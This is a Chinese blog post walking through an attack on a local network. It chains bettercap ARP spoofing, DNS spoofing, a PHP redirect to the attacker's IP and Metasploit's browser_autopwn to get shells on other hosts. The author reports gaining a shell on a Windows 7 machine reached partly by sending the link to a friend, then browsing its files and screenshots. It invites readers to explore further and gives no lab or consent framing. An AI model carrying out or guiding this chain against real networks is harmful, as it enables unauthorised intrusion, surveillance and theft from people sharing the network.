夜间模式暗黑模式
字体
阴影
滤镜
圆角
统治你的内网

测试主机:kali 2016.2

工具:bettercap、metasploit、dnsspoof、armitage

前期准备工作

在kali下并没有集成bettercap,所以我们需要自己安装

preview

安装完成

preview

启动postgresql服务

preview

metasploit数据库初始化

preview

查看数据库链接状态

preview

启动armitage(关于armitage

准备一个hosts文件(用于DNS欺骗)

PS:在hosts文件中加上端口号好像会出现一些意料不到的问题。这里我们换个思路,直接到ip地址不加端口号,然后开启apache服务,然后将下面的代码保存为index.php放在根目录下(/var/www/html/)

<?php header("Location:http://10.167.33.1:8080"); ?>

这样在DNS欺骗后会跳到指定ip,然后在通过php重定向到我们的payload。

还有一种方法是在下边启动浏览器自动攻击插件时,将端口号直接改成80端口。

/ *****************************************************准备工作完成 ****************************************************/

启动浏览器自动攻击模块:browser_autopwn

preview

等待他将所有payload加载完成

preview

arp攻击(执行:bettercap -X)

preview

DNS欺骗(忘了截图 图是后补的 所以参数有点不一样)

preview

现在我们就等鱼上钩,现在同一网关下的主机不管打开什么URL都会解析到我们的URL中,当他打开我们的URL时,程序会自动验证哪个pay可用

preview

我们的DNS欺骗只对同一网关下的主机有效,但是我们共计用的URL只要能访问到我们的地址就可以。下图可以看到有两台win10主机为arp+dns欺骗过来的,而安卓两台win7是我将这个URL发给了我的朋友,当然他也是在内网中的。最终有一台win7的浏览器成功运行了我们的payload并返回了shell。

preview

查看文件

preview

屏幕截图

preview

当然功能远远不止这些,更多好玩的可以自己探索。

水平有限,有错误请指出。
如果有一块学习的同志私聊我上车。
联系方式在关于里
暂无评论

发送评论 编辑评论


				
上一篇
下一篇